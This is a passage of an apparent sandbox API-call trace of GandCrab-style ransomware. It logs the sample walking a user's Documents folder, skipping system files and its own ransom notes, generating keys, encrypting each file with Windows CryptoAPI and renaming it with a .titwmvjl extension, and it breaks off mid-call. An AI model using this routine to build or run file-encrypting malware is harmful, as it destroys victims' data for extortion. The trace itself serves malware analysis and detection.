(lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\jb1kmbpkospd5n.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\jb1kmbpkospd5n.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0090.000] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.000] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.000] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0090.000] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0090.000] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\TITWMVJL-DECRYPT.txt" [0090.000] lstrlenW (lpString=".titwmvjl") returned 9 [0090.000] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\TITWMVJL-DECRYPT.txt") returned 104 [0090.000] VirtualAlloc (lpAddress=0x0, dwSize=0x110, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.001] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 113 [0090.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\TITWMVJL-DECRYPT.txt") returned 104 [0090.001] lstrlenW (lpString=".txt") returned 4 [0090.001] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.001] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0090.001] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0090.001] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\TITWMVJL-DECRYPT.txt") returned 104 [0090.001] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\TITWMVJL-DECRYPT.txt") returned 104 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0090.001] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0090.001] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.001] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.001] lstrcmpW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2=".") returned 1 [0090.001] lstrcmpW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="..") returned 1 [0090.001] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="wKYC4P0MQNEcrxpHkE.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls" [0090.002] lstrlenW (lpString=".titwmvjl") returned 9 [0090.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls") returned 106 [0090.002] VirtualAlloc (lpAddress=0x0, dwSize=0x114, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.002] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls.titwmvjl") returned 115 [0090.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls") returned 106 [0090.002] lstrlenW (lpString=".xls") returned 4 [0090.002] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.002] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xls ") returned 5 [0090.002] lstrcmpiW (lpString1=".xls", lpString2=".titwmvjl") returned 1 [0090.002] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls") returned 106 [0090.002] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls") returned 106 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="desktop.ini") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="autorun.inf") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="ntuser.dat") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="iconcache.db") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="bootsect.bak") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="boot.ini") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="ntuser.dat.log") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="thumbs.db") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="KRAB-DECRYPT.html") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="CRAB-DECRYPT.html") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.002] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="ntldr") returned 1 [0090.003] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="NTDETECT.COM") returned 1 [0090.003] lstrcmpiW (lpString1="wKYC4P0MQNEcrxpHkE.xls", lpString2="Bootfont.bin") returned 1 [0090.003] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls") returned 106 [0090.003] lstrlenW (lpString=".xls") returned 4 [0090.003] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.003] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xls ") returned 5 [0090.003] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.003] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.003] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\wkyc4p0mqnecrxphke.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0090.003] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.004] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0090.004] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.004] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.004] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.005] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.006] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.006] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.006] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0090.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.006] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.006] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.006] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.007] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.008] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.008] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.008] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0090.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.008] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.008] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.008] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.008] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.010] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5038f8) returned 1 [0090.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.010] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.010] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.010] GetLastError () returned 0x0 [0090.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.011] CryptDestroyKey (hKey=0x5038f8) returned 1 [0090.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.011] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.011] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.012] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503638) returned 1 [0090.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.013] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.013] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0090.013] GetLastError () returned 0x0 [0090.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.013] CryptDestroyKey (hKey=0x503638) returned 1 [0090.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.013] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.013] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.013] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.014] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x12fdd, lpOverlapped=0x0) returned 1 [0090.020] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffed023, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.020] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12fdd, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x12fdd, lpOverlapped=0x0) returned 1 [0090.021] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0090.029] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.033] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.033] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.034] CloseHandle (hObject=0x2cc) returned 1 [0090.034] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\wkyc4p0mqnecrxphke.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\wKYC4P0MQNEcrxpHkE.xls.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\wkyc4p0mqnecrxphke.xls.titwmvjl"), dwFlags=0x1) returned 1 [0090.035] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.035] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0090.035] lstrcmpW (lpString1="xyZt08shq3IZ.odt", lpString2=".") returned 1 [0090.035] lstrcmpW (lpString1="xyZt08shq3IZ.odt", lpString2="..") returned 1 [0090.035] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="xyZt08shq3IZ.odt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt" [0090.035] lstrlenW (lpString=".titwmvjl") returned 9 [0090.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt") returned 100 [0090.035] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.035] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt.titwmvjl") returned 109 [0090.035] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt") returned 100 [0090.035] lstrlenW (lpString=".odt") returned 4 [0090.035] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.035] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".odt ") returned 5 [0090.036] lstrcmpiW (lpString1=".odt", lpString2=".titwmvjl") returned -1 [0090.036] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.036] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt") returned 100 [0090.036] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt") returned 100 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="desktop.ini") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="autorun.inf") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="ntuser.dat") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="iconcache.db") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="bootsect.bak") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="boot.ini") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="ntuser.dat.log") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="thumbs.db") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="KRAB-DECRYPT.html") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="CRAB-DECRYPT.html") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="ntldr") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="NTDETECT.COM") returned 1 [0090.036] lstrcmpiW (lpString1="xyZt08shq3IZ.odt", lpString2="Bootfont.bin") returned 1 [0090.036] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt") returned 100 [0090.036] lstrlenW (lpString=".odt") returned 4 [0090.036] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.036] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".odt ") returned 5 [0090.036] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.036] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.037] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\xyZt08shq3IZ.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\xyzt08shq3iz.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0090.037] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.037] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0090.038] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.038] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.038] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.039] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.039] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.039] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.039] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0090.039] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.040] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.040] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.040] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0090.041] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.041] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.041] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.041] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0090.041] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.041] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.041] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.042] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0090.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.043] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5036f8) returned 1 [0090.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.043] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0090.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.044] CryptEncrypt (in: hKey=0x5036f8, 